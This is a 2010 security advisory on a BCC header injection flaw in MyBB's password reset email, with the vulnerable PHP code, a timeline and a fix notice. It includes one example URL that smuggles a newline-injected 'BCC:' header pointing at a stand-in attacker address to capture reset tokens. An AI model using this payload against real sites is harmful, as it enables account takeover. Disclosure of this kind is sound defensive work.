Advisory 01/2010: MyBB Password Reset Email BCC: Injection Vulnerability

                         SektionEins GmbH
                        www.sektioneins.de

                     -= Security  Advisory =-

     Advisory: MyBB Password Reset Email BCC: Injection Vulnerability
 Release Date: 2010/04/13
Last Modified: 2010/04/13
       Author: Stefan Esser [stefan.esser[at]sektioneins.de]

  Application: MyBB <= 1.4.11
     Severity: An email injection vulnerability in MyBB allows injecting
               e.g. BCC mail headers into password reset emails. This
               allows an attacker to takeover accounts via the password
               reset functionality.
         Risk: Critical
Vendor Status: MyBB 1.4.12 was released which fixes this vulnerability
    Reference: http://www.sektioneins.com/en/advisories/advisory-012010-mybb-password-reset-email-bcc-injection-vulnerability.html


Overview:


  Quote from http://www.mybboard.net
  "MyBB is a discussion board that has been around for a while; it has
   evolved from other bulletin boards into the forum package it is
   today. Therefore, it is a professional and efficient discussion
   board, developed by an active team of developers. The MyBB history
   has been recorded and is available for the interested to read.
   You can also read more about the MyBB team and why they develop
   MyBB in their spare time. We also like to highlight the most
   active and contributing fansites of the MyBB community."

  During evaluation of various password reset implementations it was
  discovered that MyBB contains an email injection vulnerability that
  allows arbitrary account takeover by injecting BCC: email headers
  through a simple URL manipulation.

  When triggering the password reset functionality via such a
  manipulated URL MyBB will send a copy of the secret password reset
  email to wherever the injected BCC: header points to.


Details:


  Inside the set_common_header() method of the MailHandler class the
  following code is responsible for adding several common headers to
  all outgoing emails. This includes all password reset emails.

     $this->headers .= "Message-ID: <{$msg_id}>{$this->delimiter}";
     $this->headers .= "Content-Transfer-Encoding: 8bit{$this->delimiter}";
     $this->headers .= "X-Priority: 3{$this->delimiter}";
     $this->headers .= "X-MSMail-Priority: Normal{$this->delimiter}";
     $this->headers .= "X-Mailer: MyBB{$this->delimiter}";
     if(defined("IN_ADMINCP"))
     {
         $_SERVER['PHP_SELF'] = str_replace($mybb->config['admin_dir']."/", "admin-", $_SERVER['PHP_SELF']);
     }
     $this->headers .= "X-MyBB-Script: {$http_host}{$_SERVER['PHP_SELF']}{$this->delimiter}";
     $this->headers .= "MIME-Version: 1.0{$this->delimiter}";

  The code above adds a "X-MyBB-Script" header to all outgoing emails,
  which contains the content of the $_SERVER['PHP_SELF'] variable.
  The problem here is that PHP_SELF does not only contain the path
  relative to the document root directory, but also extensions like
  the Apache PATH_INFO. Therefore it is controllable by malicious
  users.

  By calling a MyBB PHP script like

     http://example.com/MyBB/index.php/%0aBCC:attacker@example.com%0ax:

  it is possible to add arbitrary BCC headers to all emails sent by
  this script. If the same attack is used against the password reset
  functionality an attacker is able to grab a copy of the secret
  password reset token and the randomly generated password, which
  results in an account takeover.

  This vulnerability was fixed by the vendor by removing the code that
  adds the X-MyBB-Script header to the email.

  Furthermore it should be noted that users of the Suhosin Extension
  version 0.9.30 or newer are safe from this class of attacks because
  several unsafe characters like < > " ' \r and \n are automatically
  replaced by a ? character within PHP_SELF.

Proof of Concept:


  SektionEins GmbH is not going to release a proof of concept
  exploit for this vulnerability.


Disclosure Timeline:


  31. March 2010 - Notified the MyBB devs via security contact form
  13. April 2010 - MyBB developers released MyBB 1.4.12
  13. April 2010 - Public Disclosure


Recommendation:


  It is recommended to upgrade to the latest version of MyBB.

  Grab your copy at:
  http://mybboard.net/downloads


CVE Information:


  The Common Vulnerabilities and Exposures project (cve.mitre.org) has
  not assigned a name to this vulnerability.


GPG-Key:


  pub  1024D/15ABDA78 2004-10-17 Stefan Esser
  Key fingerprint = 7806 58C8 CFA8 CE4A 1C2C  57DD 4AE1 795E 15AB DA78


Copyright 2010 SektionEins GmbH. All rights reserved.